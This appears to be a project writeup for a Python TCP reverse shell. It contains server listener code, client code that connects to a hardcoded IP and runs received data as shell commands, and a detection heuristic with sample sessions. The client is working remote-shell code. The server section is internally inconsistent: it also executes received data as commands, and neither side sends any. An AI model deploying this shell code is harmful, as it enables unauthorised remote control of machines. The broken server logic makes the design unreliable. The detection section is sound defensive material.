Project Overview
Implements a TCP-based reverse shell allowing remote command execution on the client's machine, illustrating raw socket handling, subprocess control, and directory navigation.
Server Implementation
The server sets up a listener socket:
import socket

def createSocket():
    global s, host, port
    host = ''          # empty host binds on all interfaces
    port = 9999
    s = socket.socket()  # defaults to AF_INET / SOCK_STREAM (TCP)
    s.bind((host, port))
    s.listen(1)
After binding and listening, it accepts incoming clients and forwards them to socketAccept() for command dispatch.
Once connected, it waits for commands from the client:
import os
import subprocess

conn, addr = s.accept()  # conn is the per-client socket; s stays the listener
while True:
    data = conn.recv(1024)
    if data[:2].decode() == 'cd':
        os.chdir(data[3:].decode())  # change directory in this process
    if len(data) > 0:
        cmd = subprocess.Popen(data.decode(), shell=True,
                               stdout=subprocess.PIPE,
                               stdin=subprocess.PIPE,
                               stderr=subprocess.PIPE)
        output = cmd.stdout.read() + cmd.stderr.read()
        # reply with the command output followed by a cwd prompt
        conn.send(str.encode(output.decode() + os.getcwd() + '> '))
Commands are executed via subprocess.Popen, and the combined stdout/stderr is sent back along with the updated working directory.
Client Implementation
The client initiates the reverse connection:
import socket

s = socket.socket()
host = '10.48.64.73'
port = 9999
s.connect((host, port))
It enters a loop receiving commands from the server and executing them locally:
import os
import subprocess

while True:
    data = s.recv(1024)
    if data[:2].decode() == 'cd':
        os.chdir(data[3:].decode())  # change directory in this process
    if data:
        proc = subprocess.Popen(data.decode(), shell=True,
                                stdout=subprocess.PIPE,
                                stdin=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        out = proc.stdout.read() + proc.stderr.read()
        # reply with the command output followed by a cwd prompt
        s.send(str.encode(out.decode() + os.getcwd() + '> '))
        print(out.decode(), end='')
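The framing used by both sides above (command output, then the working directory and '> ') is what a network sensor can key on. The heuristic below is an added example, not code from this project: the prompt regex, the message layout, the direction labels and the threshold are my assumptions, and both sample sessions are constructed.

```python
import re
from typing import Dict, List, Tuple

# Each reply ends with the executor's cwd followed by '> ' (Unix or Windows
# path). Assumed pattern derived from the protocol described above.
PROMPT_RE = re.compile(rb'(?:/[^\x00\n]*|[A-Za-z]:\\[^\x00\n]*)> $')

def looks_like_prompt(payload: bytes) -> bool:
    """True if a payload ends with an absolute-path prompt like b'/tmp> '."""
    return PROMPT_RE.search(payload) is not None

def score_session(messages: List[Tuple[str, bytes]], threshold: int = 3) -> Dict[str, object]:
    """messages: (direction, payload) in wire order. Direction is 'to_executor'
    (short plain-text request) or 'from_executor' (reply). A reply that ends
    in a cwd prompt right after a short request counts as one hit."""
    requests = 0
    prompted_replies = 0
    for i, (direction, payload) in enumerate(messages):
        if direction == 'to_executor':
            requests += 1
        elif direction == 'from_executor' and looks_like_prompt(payload):
            prev = messages[i - 1] if i > 0 else None
            if prev and prev[0] == 'to_executor' and len(prev[1]) < 1024:
                prompted_replies += 1
    return {"requests": requests,
            "prompted_replies": prompted_replies,
            "suspicious": prompted_replies >= threshold}

# Constructed session mimicking the exchange described above.
SUSPICIOUS_SESSION = [
    ("to_executor", b"ls"),
    ("from_executor", b"notes.txt\nreport.pdf\n/home/user> "),
    ("to_executor", b"cd /tmp"),
    ("from_executor", b"/tmp> "),          # 'cd' produces no output, only a new prompt
    ("to_executor", b"whoami"),
    ("from_executor", b"user\n/tmp> "),
]

# Constructed benign exchange for comparison (plain HTTP).
BENIGN_SESSION = [
    ("to_executor", b"GET / HTTP/1.1\r\nHost: example.internal\r\n\r\n"),
    ("from_executor", b"HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\n<html></html>"),
]

if __name__ == "__main__":
    print(score_session(SUSPICIOUS_SESSION))
    print(score_session(BENIGN_SESSION))
```

A host-side complement is to alert on a process holding an established outbound TCP connection while repeatedly spawning shell children, which is exactly what the per-command Popen(shell=True) pattern produces.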
Key Takeaways
- Bi-directional command/control over raw TCP sockets.
- Subprocess management for remote shell execution.
- Dynamic working directory handling via remote cd commands.